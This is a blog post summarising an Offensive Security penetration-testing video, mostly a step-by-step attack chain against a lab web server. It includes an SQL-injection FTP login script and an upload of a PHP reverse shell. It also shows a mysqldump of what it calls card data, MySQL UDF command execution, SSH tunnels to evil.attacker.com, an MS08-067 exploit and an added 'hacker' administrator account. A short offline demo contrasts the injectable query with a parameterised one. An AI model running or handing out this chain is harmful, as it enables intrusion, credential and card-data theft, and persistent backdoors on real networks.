Penetration Testing in the Real World Offensive Security Video Tutorial

Hacking, cracking and penetration testing are the hot topics of this blog, and we have covered a number of tutorials based on BackTrack Linux, especially BackTrack 5 R1 because it is the newest release. There are also many BackTrack video tutorials that were made on earlier versions such as BackTrack 4; the aim is the same: to teach people how to carry out a penetration test.

Offensive Security needs no introduction. While searching the Internet I found an excellent video tutorial made by the Offensive Security team.


This video covers remote penetration testing: how to enumerate and map the internal network behind a web server (database, SMS and other servers). Although the video was recorded on an earlier version of BackTrack, it applies to BackTrack 5 R1 as well because the tools are the same.



Commands & Tools Discussed in the Video

ftp-brute.py

#!/usr/bin/env python
# ftp-brute.py: enumerate virtual FTP users through the SQL injection in the
# FTP server's MySQL authentication query. Every login sends the same payload
# with a different LIMIT offset, so each attempt logs in as the next row of
# the ftpuser table and lists that user's home directory.
from ftplib import FTP

print("Attempting user directory discovery via FTP")
for i in range(0, 6):
    # The injected UNION returns one ftpuser row; the constant 1 in the
    # second (presumably password) column is what makes the password "1" match.
    username = ("%') and 1=2 union select 1,1,uid,gid,homedir,shell "
                "from ftpuser LIMIT " + str(i) + ",1; -- ")
    password = "1"
    ftp = FTP("www.offseclabs.com")
    ftp.login(username, password)
    print("Logged in as user " + str(i) + ",1")
    ftp.retrlines("LIST")
    ftp.close()
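The FTP logins in this walkthrough only work because the FTP server's MySQL authentication query concatenates the login name into SQL. The script below is an added example, not the video's code and not anything from www.offseclabs.com: the ftpuser columns, the LIKE-based backend query, the password comparison and the six sample accounts are assumptions constructed so that the page's own payload runs unchanged, and SQLite stands in for MySQL because both accept "LIMIT offset,count" and "-- " comments. It reproduces what ftp-brute.py does against the live server, shows why offset 5 reaches the sixth row (the account whose home directory is the web root), and shows the same payload failing once the lookup uses a bound parameter.

```python
import sqlite3

# Constructed sample data (not the real ftpuser table of www.offseclabs.com):
# six virtual FTP accounts; the last one is chrooted into the web root, which
# is the account the walkthrough is hunting for with LIMIT 5,1.
FTPUSERS = [
    # user,    password,  uid,  gid,  homedir,           shell,        active
    ("alice",  "s3cret",  1000, 1000, "/home/ftp/alice", "/bin/false", 1),
    ("bob",    "bob",     1001, 1000, "/home/ftp/bob",   "/bin/false", 1),
    ("carol",  "hunter2", 1002, 1000, "/home/ftp/carol", "/bin/false", 1),
    ("dave",   "letmein", 1003, 1000, "/home/ftp/dave",  "/bin/false", 1),
    ("erin",   "qwerty",  1004, 1000, "/home/ftp/erin",  "/bin/false", 1),
    ("webadm", "Tr0ub4d", 1005, 33,   "/var/www",        "/bin/false", 1),
]

# The page's own payload; {0} is the LIMIT offset that ftp-brute.py steps through.
PAYLOAD = ("%') and 1=2 union select 1,1,uid,gid,homedir,shell "
           "from ftpuser LIMIT {0},1; -- ")


def build_db():
    """In-memory SQLite stand-in for the MySQL table behind the FTP server."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ftpuser (user TEXT, password TEXT, uid INTEGER, "
                 "gid INTEGER, homedir TEXT, shell TEXT, active INTEGER)")
    conn.executemany("INSERT INTO ftpuser VALUES (?,?,?,?,?,?,?)", FTPUSERS)
    return conn


def vulnerable_auth(conn, username, password):
    """Assumed backend query: the login name is pasted into a LIKE clause.

    The payload's leading "%')" closes that clause, "and 1=2" empties the
    genuine result, the UNION supplies a fabricated row whose second column
    (the password) is the constant 1, and "; -- " comments out the rest.
    """
    sql = ("SELECT user, password, uid, gid, homedir, shell FROM ftpuser "
           "WHERE (user LIKE '%s') AND active = 1" % username)
    row = conn.execute(sql).fetchone()
    # str(): SQLite returns the injected constant as an integer; a MySQL client
    # library would hand the server's C code the string "1" directly.
    if row is None or str(row[1]) != password:
        return None
    return {"uid": row[2], "gid": row[3], "homedir": row[4], "shell": row[5]}


def safe_auth(conn, username, password):
    """Same lookup with a bound parameter: the payload is just an unknown user."""
    sql = ("SELECT password, uid, gid, homedir, shell FROM ftpuser "
           "WHERE user = ? AND active = 1")
    row = conn.execute(sql, (username,)).fetchone()
    if row is None or row[0] != password:   # still a plaintext compare; only the injection is fixed
        return None
    return {"uid": row[1], "gid": row[2], "homedir": row[3], "shell": row[4]}


def enumerate_users(conn, auth=vulnerable_auth, count=6):
    """Offline equivalent of ftp-brute.py: one login attempt per LIMIT offset."""
    found = []
    for i in range(count):
        acct = auth(conn, PAYLOAD.format(i), "1")
        if acct is None:          # past the last row, or the backend is fixed
            break
        found.append(acct)
    return found


def find_webroot_offset(conn, webroot="/var/www"):
    """Which LIMIT offset logs in as the account whose home is the web root."""
    for i, acct in enumerate(enumerate_users(conn)):
        if acct["homedir"] == webroot:
            return i
    return None


if __name__ == "__main__":
    conn = build_db()
    for i, acct in enumerate(enumerate_users(conn)):
        print("LIMIT %d,1 -> uid=%d gid=%d homedir=%s"
              % (i, acct["uid"], acct["gid"], acct["homedir"]))
    print("web-root account is at offset", find_webroot_offset(conn))
    print("same payload against the parameterised query:",
          enumerate_users(conn, auth=safe_auth))
```

The offset is zero-based, so the "fifth user" the video refers to with LIMIT 5,1 is the sixth row of the table; running the script prints one line per offset and then an empty list for the parameterised variant, because a bound parameter turns the whole payload into a username that matches no row.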

Open Terminal A : 

nmap -p 21,80 www.offseclabs.com
nc -v www.offseclabs.com 80
HEAD / HTTP/1.0
(To enumerate the webserver)
clear
ftp www.offseclabs.com
username – bob
password – bob
(To enumerate the ftp server)
ftp www.offseclabs.com
username – %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; -- 
password – 1
(logged in to the ftp server)
pwd
ls
bye
clear
cd core
clear
nano brute.py -> (see ftp-brute.py above)
./brute.py
(the user at offset 5 has the web server's document root as its home directory)
clear
ftp www.offseclabs.com
username – %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; -- 
password – 1
(logged in as the fifth user)
ls
put rs.php -> (a reverse PHP shell)
———————–
Open Terminal B :
nc -lvp 80
———————–
Open Terminal C :
wget www.offseclabs.com/rs.php
(Then, at Terminal B, we got a reverse shell)
———————–
Go back to Terminal B :
(inside the reverse shell)
/sbin/ifconfig
pwd
cd /var/www
ls -la
cd includes
cat configure.php
(get the MySQL username and password as well as MySQL server address and database name)
mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt
————————
Open a Firefox :
www.offseclabs.com/images/ccdump.txt
(we got the database dump)
————————-
Go back to Terminal A :
(inside the ftp server)
put up.html -> (HTML file-upload form)
put up.php -> (PHP upload handler that stores the file in the database)
————————-
Open Firefox :
www.offseclabs.com/up.html
(upload lib_mysqludf_sys.so and give it the title 1)
(upload rs, a binary reverse shell, and give it the title 2)
** lib_mysqludf_sys.so is the MySQL UDF library that provides sys_exec() and sys_eval(); see the lib_mysqludf_sys project for details
—————————
Go back to Terminal A :
(quit the ftp server)
bye
clear
exit
(quit Terminal A)
—————————-
Go back to Terminal B :
mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5
(login to MySQL server)
use pwn;
SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so';
SELECT imgdata from binfile where title="2" into dumpfile '/tmp/bd';
(INTO DUMPFILE needs the FILE privilege and a directory the mysqld process can write to; on newer MySQL versions the library must be placed in plugin_dir rather than /usr/lib)
CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
SELECT sys_eval('chmod 755 /tmp/bd');
SELECT sys_eval('/tmp/bd &');
(don’t press Enter at this moment)
—————————
Open Terminal D :
nc -lvp 80
(go back to Terminal B and press Enter; you will get a reverse shell at Terminal D)
—————————-
Open Terminal E :
nc -lvp 80
—————————-
Go back to Terminal B :
(inside the MySQL server)
SELECT sys_eval(‘/tmp/bd &’);
(press enter and we got another reverse shell at Terminal E)
—————————
Go back to Terminal E :
(inside the reverse shell)
ping -c 1 10.150.0.20
clear
ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com
(create a remote tunnel at port 445)
—————————–
Open Terminal F :
netstat -antp
nmap -sS 127.0.0.1 -p445 --script smb-check-vulns.nse
—————————–
Go back to Terminal D :
ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com
(create a remote tunnel at port 4444)
clear
——————————
Go back to Terminal F :
cd core
nano nx.py -> (an MS08-067 Python exploit for Windows Server 2003 SP2)
clear
./nx.py 127.0.0.1
nc -v 127.0.0.1 4444
(we got a remote shell of 10.150.0.20)
ipconfig
net user hacker hacker /add
net localgroup administrators hacker /add
———————————
Go back to Terminal D :
(quit the tunnel)
exit
clear
ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com
(create another remote tunnel on port 3389)
clear
———————————–
Open Terminal G :
netstat -antp | grep LISTEN
clear
rdesktop 127.0.0.1
(login to the 10.150.0.20 with username – hacker and password – hacker)



Ehacking Staff